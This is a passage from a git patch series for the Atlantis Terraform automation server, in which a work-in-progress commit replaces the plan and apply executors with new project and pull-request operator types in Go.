diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go
deleted file mode 100644
index c2dcbb34f8..0000000000
--- a/server/events/yaml/workflow_test.go
+++ /dev/null
@@ -1,91 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestWorkflow_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.Workflow
-		expErr      string
-	}{
-		{
-			description: "empty",
-			input:       ``,
-			exp: yaml.Workflow{
-				Apply: nil,
-				Plan:  nil,
-			},
-		},
-		{
-			description: "yaml null",
-			input:       `~`,
-			exp: yaml.Workflow{
-				Apply: nil,
-				Plan:  nil,
-			},
-		},
-		{
-			description: "only plan/apply set",
-			input: `
-plan:
-apply:
-`,
-			exp: yaml.Workflow{
-				Apply: nil,
-				Plan:  nil,
-			},
-		},
-		{
-			description: "steps set to null",
-			input: `
-plan:
-  steps: ~
-apply:
-  steps: ~`,
-			exp: yaml.Workflow{
-				Plan: &yaml.Stage{
-					Steps: nil,
-				},
-				Apply: &yaml.Stage{
-					Steps: nil,
-				},
-			},
-		},
-		{
-			description: "steps set to empty slice",
-			input: `
-plan:
-  steps: []
-apply:
-  steps: []`,
-			exp: yaml.Workflow{
-				Plan: &yaml.Stage{
-					Steps: []yaml.Step{},
-				},
-				Apply: &yaml.Stage{
-					Steps: []yaml.Step{},
-				},
-			},
-		},
-	}
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var w yaml.Workflow
-			err := yamlv2.UnmarshalStrict([]byte(c.input), &w)
-			if c.expErr != "" {
-				ErrEquals(t, c.expErr, err)
-				return
-			}
-			Ok(t, err)
-			Equals(t, c.exp, w)
-		})
-	}
-}
diff --git a/server/events/yaml/yaml.go b/server/events/yaml/yaml.go
deleted file mode 100644
index 08b884cae0..0000000000
--- a/server/events/yaml/yaml.go
+++ /dev/null
@@ -1,4 +0,0 @@
-// Package yaml contains the golang representations of the YAML elements
-// supported in atlantis.yaml. Many of the elements implement UnmarshalYAML
-// in order to set defaults.
-package yaml

From b5e2a730de932a6da07cdfd09c72900f96927fa3 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 15 Jun 2018 14:01:09 +0100
Subject: [PATCH 21/69] WIP Add operators and get compiled.

---
 server/events/apply_executor.go               |  92 --------
 server/events/command_handler.go              |  13 +-
 server/events/event_parser.go                 |   2 +-
 server/events/execution_planner.go            | 215 ------------------
 server/events/models/models.go                |  24 ++
 server/events/plan_executor.go                | 109 ---------
 server/events/project_locker.go               |  19 +-
 server/events/project_operator.go             | 190 ++++++++++++++++
 ...cutor_test.go => project_operator_test.go} |   2 +-
 server/events/pull_request_operator.go        | 193 ++++++++++++++++
 ..._test.go => pull_request_operator_test.go} |   4 +-
 server/events/runtime/apply_step.go           |  24 --
 server/events/runtime/apply_step_operator.go  |  30 +++
 ...ep_test.go => apply_step_operator_test.go} |   0
 server/events/runtime/approval_operator.go    |  18 ++
 server/events/runtime/init_step.go            |  20 --
 server/events/runtime/init_step_operator.go   |  29 +++
 ...tep_test.go => init_step_operator_test.go} |  22 +-
 .../{plan_step.go => plan_step_operater.go}   |  52 +++--
 ...tep_test.go => plan_step_operater_test.go} |   0
 server/events/runtime/repoconfig.go           |  93 --------
 server/events/runtime/run_step.go             |  35 ---
 server/events/runtime/run_step_operator.go    |  33 +++
 ...step_test.go => run_step_operator_test.go} |   0
 server/events/runtime/runtime.go              |  18 ++
 server/events/terraform/terraform_client.go   |  13 +-
 server/events/yaml/raw/project.go             |  13 +-
 server/events/yaml/valid/valid.go             |  31 ++-
 server/server.go                              |  68 +++---
 29 files changed, 673 insertions(+), 689 deletions(-)
 delete mode 100644 server/events/apply_executor.go
 delete mode 100644 server/events/execution_planner.go
 delete mode 100644 server/events/plan_executor.go
 create mode 100644 server/events/project_operator.go
 rename server/events/{plan_executor_test.go => project_operator_test.go} (99%)
 create mode 100644 server/events/pull_request_operator.go
 rename server/events/{execution_planner_test.go => pull_request_operator_test.go} (98%)
 delete mode 100644 server/events/runtime/apply_step.go
 create mode 100644 server/events/runtime/apply_step_operator.go
 rename server/events/runtime/{apply_step_test.go => apply_step_operator_test.go} (100%)
 create mode 100644 server/events/runtime/approval_operator.go
 delete mode 100644 server/events/runtime/init_step.go
 create mode 100644 server/events/runtime/init_step_operator.go
 rename server/events/runtime/{init_step_test.go => init_step_operator_test.go} (75%)
 rename server/events/runtime/{plan_step.go => plan_step_operater.go} (54%)
 rename server/events/runtime/{plan_step_test.go => plan_step_operater_test.go} (100%)
 delete mode 100644 server/events/runtime/repoconfig.go
 delete mode 100644 server/events/runtime/run_step.go
 create mode 100644 server/events/runtime/run_step_operator.go
 rename server/events/runtime/{run_step_test.go => run_step_operator_test.go} (100%)

diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
deleted file mode 100644
index 260a7fffa0..0000000000
--- a/server/events/apply_executor.go
+++ /dev/null
@@ -1,92 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
-	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/run"
-	"github.com/runatlantis/atlantis/server/events/terraform"
-	"github.com/runatlantis/atlantis/server/events/vcs"
-	"github.com/runatlantis/atlantis/server/events/webhooks"
-)
-
-// ApplyExecutor handles executing terraform apply.
-type ApplyExecutor struct {
-	VCSClient         vcs.ClientProxy
-	Terraform         *terraform.DefaultClient
-	RequireApproval   bool
-	Run               *run.Run
-	AtlantisWorkspace AtlantisWorkspace
-	ProjectLocker     *DefaultProjectLocker
-	Webhooks          webhooks.Sender
-	ExecutionPlanner  *ExecutionPlanner
-}
-
-// Execute executes apply for the ctx.
-func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse {
-	//if a.RequireApproval {
-	//	approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull)
-	//	if err != nil {
-	//		return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")}
-	//	}
-	//	if !approved {
-	//		return CommandResponse{Failure: "Pull request must be approved before running apply."}
-	//	}
-	//	ctx.Log.Info("confirmed pull request was approved")
-	//}
-
-	repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
-	if err != nil {
-		return CommandResponse{Failure: "No workspace found. Did you run plan?"}
-	}
-	ctx.Log.Info("found workspace in %q", repoDir)
-
-	stage, err := a.ExecutionPlanner.BuildApplyStage(ctx.Log, repoDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username)
-	if err != nil {
-		return CommandResponse{Error: err}
-	}
-
-	// check if we have the lock
-	tryLockResponse, err := a.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir))
-	if err != nil {
-		return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}}
-	}
-	if !tryLockResponse.LockAcquired {
-		return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}}
-	}
-
-	// Check apply requirements.
-	for _, req := range stage.ApplyRequirements {
-		isMet, reason := req.IsMet()
-		if !isMet {
-			return CommandResponse{Failure: reason}
-		}
-	}
-
-	out, err := stage.Run()
-
-	// Send webhooks even if there's an error.
-	a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
-		Workspace: ctx.Command.Workspace,
-		User:      ctx.User,
-		Repo:      ctx.BaseRepo,
-		Pull:      ctx.Pull,
-		Success:   err == nil,
-	})
-
-	if err != nil {
-		return CommandResponse{Error: err}
-	}
-	return CommandResponse{ProjectResults: []ProjectResult{{ApplySuccess: out}}}
-}
diff --git a/server/events/command_handler.go b/server/events/command_handler.go
index 54c0ffa47f..e327c13ee3 100644
--- a/server/events/command_handler.go
+++ b/server/events/command_handler.go
@@ -53,8 +53,6 @@ type GitlabMergeRequestGetter interface {
 
 // CommandHandler is the first step when processing a comment command.
 type CommandHandler struct {
-	PlanExecutor             Executor
-	ApplyExecutor            Executor
 	VCSClient                vcs.ClientProxy
 	GithubPullGetter         GithubPullGetter
 	GitlabMergeRequestGetter GitlabMergeRequestGetter
@@ -68,7 +66,8 @@ type CommandHandler struct {
 	// AllowForkPRsFlag is the name of the flag that controls fork PR's. We use
 	// this in our error message back to the user on a forked PR so they know
 	// how to enable this functionality.
-	AllowForkPRsFlag string
+	AllowForkPRsFlag    string
+	PullRequestOperator PullRequestOperator
 }
 
 // ExecuteCommand executes the command.
@@ -169,9 +168,13 @@ func (c *CommandHandler) run(ctx *CommandContext) {
 	var cr CommandResponse
 	switch ctx.Command.Name {
 	case Plan:
-		cr = c.PlanExecutor.Execute(ctx)
+		if ctx.Command.Autoplan {
+			cr = c.PullRequestOperator.Autoplan(ctx)
+		} else {
+			cr = c.PullRequestOperator.PlanViaComment(ctx)
+		}
 	case Apply:
-		cr = c.ApplyExecutor.Execute(ctx)
+		cr = c.PullRequestOperator.ApplyViaComment(ctx)
 	default:
 		ctx.Log.Err("failed to determine desired command, neither plan nor apply")
 	}
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index 742a765a99..bfe08a6c68 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -36,7 +36,7 @@ type Command struct {
 	// Dir is the path relative to the repo root to run the command in.
 	// Will never be an empty string and will never end in "/".
 	Dir string
-	// Flags are the extra arguments appended to comment,
+	// CommentArgs are the extra arguments appended to comment,
 	// ex. atlantis plan -- -target=resource
 	Flags     []string
 	Name      CommandName
diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go
deleted file mode 100644
index 4b13ce2190..0000000000
--- a/server/events/execution_planner.go
+++ /dev/null
@@ -1,215 +0,0 @@
-package events
-
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-
-	"github.com/hashicorp/go-version"
-	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/runtime"
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	"github.com/runatlantis/atlantis/server/events/yaml/valid"
-	"github.com/runatlantis/atlantis/server/logging"
-)
-
-const PlanStageName = "plan"
-const ApplyStageName = "apply"
-const AtlantisYAMLFilename = "atlantis.yaml"
-
-type ExecutionPlanner struct {
-	TerraformExecutor TerraformExec
-	DefaultTFVersion  *version.Version
-	ParserValidator   *yaml.ParserValidator
-	ProjectFinder     ProjectFinder
-}
-
-type TerraformExec interface {
-	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
-}
-
-func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (runtime.PlanStage, error) {
-	defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
-	if err != nil {
-		return runtime.PlanStage{}, err
-	}
-	return runtime.PlanStage{
-		Steps:       steps,
-		Workspace:   workspace,
-		ProjectPath: relProjectPath,
-	}, nil
-}
-
-func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]runtime.PlanStage, error) {
-	// If there is an atlantis.yaml
-	// -> Get modified files from pull request.
-	// -> For each project, if autoplan == true && files match
-	// ->->  Build plan stage for that project.
-	// Else
-	// -> Get modified files
-	// -> For each modified project use default plan stage.
-	config, err := s.ParserValidator.ReadConfig(repoDir)
-	if err != nil && !os.IsNotExist(err) {
-		return nil, err
-	}
-
-	// If there is no config file, then we try to plan for each project that
-	// was modified in the pull request.
-	if os.IsNotExist(err) {
-		projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir)
-		var stages []runtime.PlanStage
-		for _, p := range projects {
-			// NOTE: we use the default workspace because we don't know about
-			// other workspaces. If users want to plan for other workspaces they
-			// need to use a config file.
-			steps := s.defaultPlanSteps(log, repoDir, models.DefaultWorkspace, p.Path, nil, username)
-			stages = append(stages, runtime.PlanStage{
-				Steps:       steps,
-				Workspace:   models.DefaultWorkspace,
-				ProjectPath: p.Path,
-			})
-		}
-		return stages, nil
-	}
-
-	// Else we run plan according to the config file.
-	var stages []runtime.PlanStage
-	for _, p := range config.Projects {
-		if s.shouldAutoplan(p.Autoplan, modifiedFiles) {
-			// todo
-			stages = append(stages)
-		}
-	}
-	return stages, nil
-}
-
-func (s *ExecutionPlanner) shouldAutoplan(autoplan valid.Autoplan, modifiedFiles []string) bool {
-	return true
-}
-
-func (s *ExecutionPlanner) getSteps() {
-
-}
-
-func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*runtime.ApplyStage, error) {
-	defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
-	if err != nil {
-		return nil, err
-	}
-	return &runtime.ApplyStage{
-		Steps: steps,
-	}, nil
-}
-
-func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []runtime.Step) ([]runtime.Step, error) {
-	config, err := s.ParserValidator.ReadConfig(repoDir)
-
-	// If there's no config file, use defaults.
-	if os.IsNotExist(err) {
-		log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename)
-		return defaults, nil
-	}
-
-	if err != nil {
-		return nil, err
-	}
-
-	// Get this project's configuration.
-	for _, p := range config.Projects {
-		if p.Dir == relProjectPath && p.Workspace == workspace {
-			workflowNamePtr := p.Workflow
-
-			// If they didn't specify a workflow, use the default.
-			if workflowNamePtr == nil {
-				log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename)
-				return defaults, nil
-			}
-
-			// If they did specify a workflow, find it.
-			workflowName := *workflowNamePtr
-			workflow, exists := config.Workflows[workflowName]
-			if !exists {
-				return nil, fmt.Errorf("no workflow with key %q defined", workflowName)
-			}
-
-			// We have a workflow defined, so now we need to build it.
-			meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-			var steps []runtime.Step
-			var stepsConfig []valid.Step
-			if stageName == PlanStageName {
-				stepsConfig = workflow.Plan.Steps
-			} else {
-				stepsConfig = workflow.Apply.Steps
-			}
-			for _, stepConfig := range stepsConfig {
-				var step runtime.Step
-				switch stepConfig.StepName {
-				case "init":
-					step = &runtime.InitStep{
-						Meta:      meta,
-						ExtraArgs: stepConfig.ExtraArgs,
-					}
-				case "plan":
-					step = &runtime.PlanStep{
-						Meta:      meta,
-						ExtraArgs: stepConfig.ExtraArgs,
-					}
-				case "apply":
-					step = &runtime.ApplyStep{
-						Meta:      meta,
-						ExtraArgs: stepConfig.ExtraArgs,
-					}
-				case "run":
-					step = &runtime.RunStep{
-						Meta:     meta,
-						Commands: stepConfig.RunCommand,
-					}
-				}
-				steps = append(steps, step)
-			}
-			return steps, nil
-		}
-	}
-	// They haven't defined this project, use the default workflow.
-	log.Info("no project with dir %q and workspace %q defined; continuing with defaults", relProjectPath, workspace)
-	return defaults, nil
-}
-
-func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) runtime.StepMeta {
-	return runtime.StepMeta{
-		Log:                   log,
-		Workspace:             workspace,
-		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
-		DirRelativeToRepoRoot: relProjectPath,
-		// If there's no config then we should use the default tf version.
-		TerraformVersion:  s.DefaultTFVersion,
-		TerraformExecutor: s.TerraformExecutor,
-		ExtraCommentArgs:  extraCommentArgs,
-		Username:          username,
-	}
-}
-
-func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step {
-	meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	return []runtime.Step{
-		&runtime.InitStep{
-			ExtraArgs: nil,
-			Meta:      meta,
-		},
-		&runtime.PlanStep{
-			ExtraArgs: nil,
-			Meta:      meta,
-		},
-	}
-}
-func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step {
-	meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	return []runtime.Step{
-		&runtime.ApplyStep{
-			ExtraArgs: nil,
-			Meta:      meta,
-		},
-	}
-}
diff --git a/server/events/models/models.go b/server/events/models/models.go
index 1d8d72453f..30faf4ea23 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -24,6 +24,8 @@ import (
 	"time"
 
 	"github.com/pkg/errors"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	"github.com/runatlantis/atlantis/server/logging"
 )
 
 // DefaultWorkspace is the default Terraform workspace for both Atlantis and
@@ -210,3 +212,25 @@ func (h VCSHostType) String() string {
 	}
 	return "<missing String() implementation>"
 }
+
+type ProjectCommandContext struct {
+	// BaseRepo is the repository that the pull request will be merged into.
+	BaseRepo Repo
+	// HeadRepo is the repository that is getting merged into the BaseRepo.
+	// If the pull request branch is from the same repository then HeadRepo will
+	// be the same as BaseRepo.
+	// See https://help.github.com/articles/about-pull-request-merges/.
+	HeadRepo Repo
+	Pull     PullRequest
+	// User is the user that triggered this command.
+	User          User
+	Log           *logging.SimpleLogger
+	RepoRelPath   string
+	ProjectConfig *valid.Project
+	GlobalConfig  *valid.Spec
+
+	// CommentArgs are the extra arguments appended to comment,
+	// ex. atlantis plan -- -target=resource
+	CommentArgs []string
+	Workspace   string
+}
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
deleted file mode 100644
index 4dd221422f..0000000000
--- a/server/events/plan_executor.go
+++ /dev/null
@@ -1,109 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
-	"fmt"
-
-	"github.com/pkg/errors"
-	"github.com/runatlantis/atlantis/server/events/locking"
-	"github.com/runatlantis/atlantis/server/events/run"
-	"github.com/runatlantis/atlantis/server/events/runtime"
-	"github.com/runatlantis/atlantis/server/events/terraform"
-	"github.com/runatlantis/atlantis/server/events/vcs"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
-
-type LockURLGenerator interface {
-	GenerateLockURL(lockID string) string
-}
-
-// PlanExecutor handles everything related to running terraform plan.
-type PlanExecutor struct {
-	VCSClient        vcs.ClientProxy
-	Terraform        terraform.Client
-	Locker           locking.Locker
-	Run              run.Runner
-	Workspace        AtlantisWorkspace
-	ProjectFinder    ProjectFinder
-	ProjectLocker    ProjectLocker
-	ExecutionPlanner *ExecutionPlanner
-	LockURLGenerator LockURLGenerator
-}
-
-// PlanSuccess is the result of a successful plan.
-type PlanSuccess struct {
-	TerraformOutput string
-	LockURL         string
-}
-
-// Execute executes terraform plan for the ctx.
-func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse {
-	cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
-	if err != nil {
-		return CommandResponse{Error: err}
-	}
-
-	var stages []runtime.PlanStage
-	if ctx.Command.Autoplan {
-		modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
-		if err != nil {
-			return CommandResponse{Error: errors.Wrap(err, "getting modified files")}
-		}
-		stages, err = p.ExecutionPlanner.BuildAutoplanStages(ctx.Log, ctx.BaseRepo.FullName, cloneDir, ctx.User.Username, modifiedFiles)
-		if err != nil {
-			return CommandResponse{Error: err}
-		}
-	} else {
-		stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username)
-		if err != nil {
-			return CommandResponse{Error: err}
-		}
-		stages = append(stages, stage)
-	}
-
-	var projectResults []ProjectResult
-	for _, stage := range stages {
-		projectResult := ProjectResult{
-			Path:      stage.ProjectPath,
-			Workspace: stage.Workspace,
-		}
-
-		// todo: this should be moved into the plan stage
-		//tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir))
-		//if err != nil {
-		//	return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}}
-		//}
-		//if !tryLockResponse.LockAcquired {
-		//	return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}}
-		//}
-		// todo: endtodo
-
-		out, err := stage.Run()
-		if err != nil {
-			//if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil {
-			//	ctx.Log.Err("error unlocking state after plan error: %s", unlockErr)
-			//}
-			projectResult.Error = fmt.Errorf("%s\n%s", err.Error(), out)
-		} else {
-			projectResult.PlanSuccess = &PlanSuccess{
-				TerraformOutput: out,
-				//LockURL:         p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey),
-			}
-		}
-		projectResults = append(projectResults, projectResult)
-	}
-	return CommandResponse{ProjectResults: projectResults}
-}
diff --git a/server/events/project_locker.go b/server/events/project_locker.go
index 9b7060585b..e6983d5c06 100644
--- a/server/events/project_locker.go
+++ b/server/events/project_locker.go
@@ -18,8 +18,7 @@ import (
 
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/run"
-	"github.com/runatlantis/atlantis/server/events/terraform"
+	"github.com/runatlantis/atlantis/server/logging"
 )
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker
@@ -33,15 +32,12 @@ type ProjectLocker interface {
 	// The third return value is a function that can be called to unlock the
 	// lock. It will only be set if the lock was acquired. Any errors will set
 	// error.
-	TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error)
+	TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error)
 }
 
 // DefaultProjectLocker implements ProjectLocker.
 type DefaultProjectLocker struct {
-	Locker       locking.Locker
-	ConfigReader ProjectConfigReader
-	Terraform    terraform.Client
-	Run          run.Runner
+	Locker locking.Locker
 }
 
 // TryLockResponse is the result of trying to lock a project.
@@ -60,13 +56,12 @@ type TryLockResponse struct {
 }
 
 // TryLock implements ProjectLocker.TryLock.
-func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) {
-	workspace := ctx.Command.Workspace
-	lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User)
+func (p *DefaultProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) {
+	lockAttempt, err := p.Locker.TryLock(project, workspace, pull, user)
 	if err != nil {
 		return nil, err
 	}
-	if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num {
+	if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != pull.Num {
 		failureMsg := fmt.Sprintf(
 			"This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
 			lockAttempt.CurrLock.Pull.Num)
@@ -75,7 +70,7 @@ func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Proje
 			LockFailureReason: failureMsg,
 		}, nil
 	}
-	ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey)
+	log.Info("acquired lock with id %q", lockAttempt.LockKey)
 	return &TryLockResponse{
 		LockAcquired: true,
 		UnlockFn: func() error {
diff --git a/server/events/project_operator.go b/server/events/project_operator.go
new file mode 100644
index 0000000000..37dfcb5f01
--- /dev/null
+++ b/server/events/project_operator.go
@@ -0,0 +1,190 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//    http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+	"path/filepath"
+	"strings"
+
+	"github.com/pkg/errors"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/runtime"
+	"github.com/runatlantis/atlantis/server/events/webhooks"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
+
+type LockURLGenerator interface {
+	GenerateLockURL(lockID string) string
+}
+
+// PlanSuccess is the result of a successful plan.
+type PlanSuccess struct {
+	TerraformOutput string
+	LockURL         string
+}
+
+type ProjectOperator struct {
+	Locker            ProjectLocker
+	LockURLGenerator  LockURLGenerator
+	InitStepOperator  runtime.InitStepOperator
+	PlanStepOperator  runtime.PlanStepOperator
+	ApplyStepOperator runtime.ApplyStepOperator
+	RunStepOperator   runtime.RunStepOperator
+	ApprovalOperator  runtime.ApprovalOperator
+	Workspace         AtlantisWorkspace
+	Webhooks          *webhooks.MultiWebhookSender
+}
+
+func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult {
+	// Acquire Atlantis lock for this repo/dir/workspace.
+	lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath))
+	if err != nil {
+		return ProjectResult{Error: errors.Wrap(err, "acquiring lock")}
+	}
+	if !lockAttempt.LockAcquired {
+		return ProjectResult{Failure: lockAttempt.LockFailureReason}
+	}
+
+	// Ensure project has been cloned.
+	var projAbsPath string
+	if projAbsPathPtr == nil {
+		repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
+		if err != nil {
+			if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+				ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+			}
+			return ProjectResult{Error: err}
+		}
+		projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath)
+	} else {
+		projAbsPath = *projAbsPathPtr
+	}
+
+	// Use default stage unless another workflow is defined in config
+	stage := p.defaultPlanStage()
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+		configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow)
+		if configuredStage != nil {
+			stage = *configuredStage
+		}
+	}
+	outputs, err := p.runSteps(stage.Steps, ctx, projAbsPath)
+	if err != nil {
+		if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+			ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+		}
+		// todo: include output from other steps.
+		return ProjectResult{Error: err}
+	}
+
+	return ProjectResult{
+		PlanSuccess: &PlanSuccess{
+			LockURL:         p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey),
+			TerraformOutput: strings.Join(outputs, "\n"),
+		},
+	}
+}
+
+func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
+	var outputs []string
+	for _, step := range steps {
+		var out string
+		var err error
+		switch step.StepName {
+		case "init":
+			out, err = p.InitStepOperator.Run(ctx, step.ExtraArgs, absPath)
+		case "plan":
+			out, err = p.PlanStepOperator.Run(ctx, step.ExtraArgs, absPath)
+		case "apply":
+			out, err = p.ApplyStepOperator.Run(ctx, step.ExtraArgs, absPath)
+		case "run":
+			out, err = p.RunStepOperator.Run(ctx, step.RunCommand, absPath)
+		}
+
+		if err != nil {
+			// todo: include output from other steps.
+			return nil, err
+		}
+		if out != "" {
+			outputs = append(outputs, out)
+		}
+	}
+	return outputs, nil
+}
+
+func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string) ProjectResult {
+	if ctx.ProjectConfig != nil {
+		for _, req := range ctx.ProjectConfig.ApplyRequirements {
+			switch req {
+			case "approved":
+				approved, err := p.ApprovalOperator.IsApproved(ctx.BaseRepo, ctx.Pull)
+				if err != nil {
+					return ProjectResult{Error: errors.Wrap(err, "checking if pull request was approved")}
+				}
+				if !approved {
+					return ProjectResult{Failure: "Pull request must be approved before running apply."}
+				}
+			}
+		}
+	}
+
